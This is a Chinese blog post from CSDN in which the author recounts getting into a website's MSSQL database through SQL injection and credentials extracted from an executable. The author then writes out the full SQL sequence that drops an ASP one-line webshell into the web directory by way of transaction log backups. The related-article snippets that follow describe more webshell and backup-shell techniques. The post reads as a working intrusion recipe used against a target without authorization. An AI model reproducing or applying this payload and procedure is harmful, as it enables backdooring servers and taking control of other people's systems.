利用log备份得到webshell

最新推荐文章于 2022-08-25 20:28:33 发布
最新推荐文章于 2022-08-25 20:28:33 发布
阅读量1.5k 收藏
点赞数
分类专栏: 安全 文章标签: 远程连接 database disk insert cmd image
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liswa/article/details/638149
版权

经历:通过 ' or ''=' 进入,下载回来一个exe文件的报名器,用ultraedit得到其中的mssql连接密码,是dbowner权限 ,可以远程连接,使用xp_dirtree 'd:/',1,1 得到其web目录,在网上查得一种 log备份得到webshell的技巧

alter database xxxx set RECOVERY FULL
create table cmd (a image)
backup log xxxx to disk = 'd:/web/1.asp' with init
insert into cmd (a) values ('<%If Request("k")<>"" Then Execute(Request("k"))%>')
backup log xxxx to disk = 'd:/web/2.asp'

由于数据库使用时间很长了,log文件很大,执行需要很长时间

之后访问2.asp,删除1.asp,不过,如果目标盘上空间不够,备份就成问题了。

liswa
关注
专栏目录
利用WebShellShell技巧
悦分享
08-01 1984
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,可以使用浏览器来访问留下的后门,达到控制网站服务器的目的。shell的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。...
数据库上传WebShell的三种方式
m0_48520508的博客
08-08 3457
一、什么是WebShell? 简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。 为了更好理解WebShell我们学习两个概念: 什么是“木马”? “木马”全称是“特洛伊木马(Trojan Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市.
测试成功的log备份webshell代码
02-12
测试成功的log备份webshell代码。 郑重声明:此代码收集于网络,仅用于个人计算机技术学习,用于非法用途者后果自负,本人不承担任何责任和连带责任!
利用log备份获取WEBSHELL
得峰的专栏 [网络收藏]
05-31 1124
利用log备份获取WEBSHELL 大 | 中 | 小 [ 2006/04/02 20:43 | by NetKnave ] 利用log备份获取WEBSHELL Blog被人渗透了一下,不知道各位掉了什么东西没有。原来有一次blog的目录可以列出来,那次我掉了一个小东西,然后今天别人告诉我NBSI 3用了那个东西的方法……呵呵,有点晕,就是下面的,成功率还是很高的,
lOG备份SHELL
c_xxx的专栏
05-04 920
来源: swan dbowner 通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功率及重用性呢?如果单从调整增量备份的方式来看,尽管能够达到一些效果,但是方法比较复杂而且效果不明显。加上关于重用性的考虑,例如多次备份的成功率,backupdatab
利用Log备份获取Webshell
loyos的专栏
08-08 881
Blog被人渗透了一下,不知道各位掉了什么东西没有。原来有一次blog的目录可以列出来,那次我掉了一个小东西,然后今天别人告诉我NBSI 3用了那个东西的方法……呵呵,有点晕,就是下面的,成功率还是很高的,大家可以试试看。嗯,方法流出去无所谓,文章留着吧。   dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什
数据库备份webshell
weixin_41657031的博客
01-13 1350
数据库备份webshell 原理 ​ 数据库备份webshell主要前提是能进入到应用系统后台,并且有数据库备份功能。 ​ 当我们想法设法进入到一个系统后台之后,本以为找一个文件上传的地方来上传一个webshell,但是上传点却是限制得死死的,高强度的白名单限制,各种绕过都没有成功,恰巧该系统后台中有数据库备份这个功能,此时我们可以通过数据库备份来拿webshell! ​ 首...
MSSQL 2005 LOG备份webshell的方法
09-14
在IT安全领域,尤其是Web应用安全中,"MSSQL 2005 LOG备份webshell的方法"是指利用Microsoft SQL Server 2005数据库管理系统中的日志备份功能来植入Webshell的一种技术。Webshell是一种恶意代码,通常由攻击者在目标...
获取webshell的方法
gugonggugong的博客
01-16 753
一、管理员权限进后台 正常上传:网站对上传文件的后缀并未过滤,直接上传 数据库备份与恢复:网站对上传的文件后缀有过滤,但网站有数据库备份的功能,可以将WebShell格式先改为允许上传的文件格式,然后,我们找到上传后的文件路径,通过数据库备份,将文件备份为脚本格式。 数据库配置文件插码:往配置文件中写入木马 各种绕过姿势:00%截断;特殊后缀文件名绕过;文件名大小绕过 利用解析漏洞:利用低版本的中间件apache、ng...
复现mysql 备份上传木马,并用shell工具连接操作
weixin_64655821的博客
08-25 353
复现mysql 备份上传木马,并用shell工具连接操作
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具)
05-02
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具等等!)
备份数据库的shell
weixin_34343000的博客
05-29 98
#!/bin/bash #定义备份数据库名 dbname=yourdbname #定义备份数据库的用户名和密码 dbuser=yourdbuser dbpasswd=yourdbpasswd #数据库备份路径 backuppath=/home/dbback/sqlzip/ #数据库备份日志文件存储的路径 logfile=/home/dbback/log/db_backup.l...
MSSQL2005差异备份shell (MSSQL2005 Backup Get Shell)
blogfeifei
07-15 185
昨晚在拿站过程中遇到了个ASP+MSSQL2005的注入点,权限是DB_Owner的权限,网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。 后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具...
75.网络安全渗透测试—[SQL注入篇14]—[SQLSERVER+ASP-LOG日志备份webshell]
qwsn
01-19 2529
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER 日志备份相关概念 1、SQLSERVER的备份 2、数据库故障还原类型 3、ASP一句话: 4、此时我们就可以通过备份log文件,得到webshell了 5、优化webshell: 6、最终形成的payload: 7、如何判断是否拿到Webshell 二、SQLSERVER+ASP 日志备份webshell示例: 1、判断数据库名:mydb 2、备份日志,拿webshell 3、判断是否写入w
mssql差异备份shell
一个码农的笔记
03-08 5335
(1)首先: declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s; 注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换 这里的数据库名字是:Newpor
数据库备份---Shell脚本
geng2568的博客
03-18 1605
在一家公司做开发时,在修改bug时,一不小心把数据库中的两张关联表中的数据全部删除了,当时数据还不是特别多,毕竟项目刚上线不久,以前也听说过这种类似的事情,没想到竟然发生在了自己身上,简直太蠢了。后来才编写了shell脚本,每天自动备份数据库中的数据。 一、编写resman.sh脚本内容(这格式备份一个数据库的内容): #!/bin/bash #保存的备份数 number=3 #备份保存路...
一个备份MySQL数据库的简单Shell脚本
科比不来it
12-31 1270
Shell脚本是我们写不同类型命令的一种脚本,这些命令在这一个文件中就可以执行。我们也可以逐一敲入命令手动执行。如果我们要使用shell脚本就必须在一开始把这些命令写到一个文本文件中,以后就可以随意反复运行这些命令了。 我首先要在本文带给你的是完整脚本。后面会对该脚本做说明。我假定你已经知道shell scripting、 mysqldump和crontab。 适用操作系统:任何Lin
mysql差异备份shell_MSSQL差异备份shell(转) | 学步园
weixin_39917811的博客
01-19 126
MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少!差异备份的流程大概这样:1.完整备份一次(保存位置当然可以改)backup database 库名 to disk ='c:\ddd.bak';--2.创建表并插入数据create tabl...
mysql差异备份shell_Shell脚本实现跨云数据库自动备份
weixin_31256683的博客
02-02 338
点击了解更多技术资料和免费学习视频,请加入讨论群:662736393欢迎关注百哥IT技术专栏,联系QQ:3473067134一、为什么要跨云进行数据库备份虽然各个云服务商为企业建设IT系统提供了极大便利,也实现了很高的可靠性,但仍然不是万无一失的,这些例子都曾造成很大的影响不久前,微盟工程师恶意删库,导致大量客户数据丢失,该事件几乎在所有IT从业者朋友圈刷屏。18年8月,腾讯云服务器一个硬盘固件b...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值